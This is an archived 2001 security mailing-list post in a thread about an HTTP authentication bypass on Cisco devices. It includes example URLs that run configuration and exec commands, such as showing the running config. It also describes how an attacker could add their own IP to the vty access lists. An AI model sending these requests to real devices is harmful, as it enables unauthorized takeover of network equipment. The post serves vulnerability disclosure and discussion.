Cisco device HTTP exploit...

From: Half Adder (dps@Lib-Vai.lib.asu.edu)
Date: Mon Jul 02 2001 - 13:56:37 PDT

Next message: Katherine_Spanbauerat_private: "Re: Lotus Domino Server Cross-Site Scripting Vulnerability"

Previous message: sco-securityat_private: "Security Update: [CSSA-2001-SCO.6] UnixWare: statd buffer overflow"
Next in thread: Marc-Adrian Napoli: "Re: Cisco device HTTP exploit..."
Reply: Marc-Adrian Napoli: "Re: Cisco device HTTP exploit..."
Reply: Grzegorz Krawczyk: "Re: Cisco device HTTP exploit..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

You can also run configuration commands. :)

http://169.254.0.15/level/42/configure/-/banner/motd/LINE, etc.

Start with http://169.254.0.16/level/xx/configure  and go from there.

A malicious user could use:

http://169.254.0.15/level/42/exec/show%20conf

to get, for instance, vty 0 4 acl information and then add an ACL for
his/her source ip. 

I tested creating a banner.  I assume other configure commands will work
as well.  This was tested on a Cisco switch.  Anyone?

Next message: Katherine_Spanbauerat_private: "Re: Lotus Domino Server Cross-Site Scripting Vulnerability"
Previous message: sco-securityat_private: "Security Update: [CSSA-2001-SCO.6] UnixWare: statd buffer overflow"
Next in thread: Marc-Adrian Napoli: "Re: Cisco device HTTP exploit..."
Reply: Marc-Adrian Napoli: "Re: Cisco device HTTP exploit..."
Reply: Grzegorz Krawczyk: "Re: Cisco device HTTP exploit..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 02 2001 - 19:06:01 PDT